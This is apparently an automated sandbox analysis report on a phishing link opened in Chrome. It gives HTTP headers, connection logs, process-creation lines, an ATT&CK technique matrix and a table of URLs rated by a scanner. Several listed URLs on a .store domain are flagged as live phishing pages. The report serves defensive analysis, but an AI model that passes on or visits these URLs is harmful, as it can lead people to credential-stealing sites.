          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: FkcWwgb7Dmw4e4VjAaLhkw==$gBZq9TbKZoi7EXeoZfxJLA==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 887db9b30ca1c33c-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: upV0u8LWBx9GG+Y4JnyFXw==$Nr7rovYGjbl54dOQs4y8Uw==Server: cloudflareCF-RAY: 887db9cb895e1931-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 4N/RKs4bS7wOS1lhihDNLA==$IeKueMfJ5cyZ0qJNrMlr1w==Server: cloudflareCF-RAY: 887dba11bc3e1784-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16602Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 5ihPIvxpIY502NWrVRFIkQ==$3sUoyaqXS5Vl1MxQFh8mEQ==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2iigghEMeYTGuaF1BuccKlUpSQ9xH6cMjb9kHi7hIKWnr75opPpVg8iu%2FyCryREZKnbQIb%2BjLO2jAMBHWemSQeiALv%2FsmU9OaZVk6C5H6ComXEA4DAkZccKeLU8UixCh8pd3rlv6LcUknM1aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 887dba154bc443bf-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:25 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5vo4OVo4zWhkyQClFNRSBqmDHkroGg4kkZ8WvPgkQryvEPB%2B%2BiRaxcXE6pP94ovxajWINn1bZHUvGnC6IT0uGywUf0arU7%2Fqf4nFyPWHax5x0Igm2fMHrFGLbX0EcIEiZb9L19mbCAQ%2FhbOmg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 887dba289bc842b0-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16151Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16527Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16294Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16310Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16506Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: chromecache_80.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_80.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_80.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: classification engineClassification label: mal88.phis.troj.win@21/58@24/8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2124,i,15610489227219973770,6492909471332572734,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2124,i,15610489227219973770,6492909471332572734,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 3.9.pages.csv, type: HTML
          Source: Yara matchFile source: 4.10.pages.csv, type: HTML
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss100%Avira URL Cloudphishing
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://getbootstrap.com/)0%URL Reputationsafe
          https://gth.miconlinestickbu.store/boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=887db9822f538c41100%Avira URL Cloudphishing
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/887db996294478e1/1716390545215/fdcd7d549205ee077dcead15de05e39851605c03eb2db3a456277fbb95e594a1/I2uC-N-gD_nQrj80%Avira URL Cloudsafe
          https://gth.miconlinestickbu.store/jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/ASSETS/img/sig-op.svg100%Avira URL Cloudphishing
          https://vakspecialisten.store/noki/x-cp-Ruytfvb6hnx.php0%Avira URL Cloudsafe
          https://gth.miconlinestickbu.store/1100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db100%Avira URL Cloudphishing
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887db996294478e10%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b670%Avira URL Cloudsafe
          https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
          https://gth.miconlinestickbu.store/favicon.ico100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/js/617b5a702a34daddd03071650f95cbe6664e0aa35f13a100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/ASSETS/img/m_.svg100%Avira URL Cloudphishing
          https://a.nel.cloudflare.com/report/v4?s=CrtbplJ7Ts50Ffwf6vozefv3cO5hcbSp1dY35h%2B1vnVp8C%2BTOBbW0Hu3WR10kmnw3cxMfskrN3XrfVP91I%2FAsF97vlawby2SsmBs8QbOgeKWURONYgE%2BZDfEhjfU5xxw4ZAg0%2FV9VVJipSh0rg%3D%3D0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=qVRIKX92qaRfJ6gaBUntmAPdh1Gwu3PvCRc3bNwsPhnTsilQ5DZU4Um%2B7FhcPbmw5rS%2FuybWvO1YxIIbCiiaJDTmsIr9eqHJy%2FRBl67sy9FO5QyJv%2Bk9%2FbuWnA4%2BsCQk4oY9veVPX4QDP0cfbw%3D%3D0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu0%Avira URL Cloudsafe
          https://gth.miconlinestickbu.store/o/617b5a702a34daddd03071650f95cbe6664e0aa557579100%Avira URL Cloudphishing
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
          https://a.nel.cloudflare.com/report/v4?s=0IwYs16BqjdC9UTsglWvKBt1Ntc568lsx9VkFcXyxBxndNRCRQhgf9nhelPmj764DdU0LaKE2Vk0WDve7hL6KRFFs9X9xEmplyk1PBZNDyDoxKbI5hNUkpBA%2BhKbk2LZQH9kJA6jtQtpNY1gyg%3D%3D0%Avira URL Cloudsafe
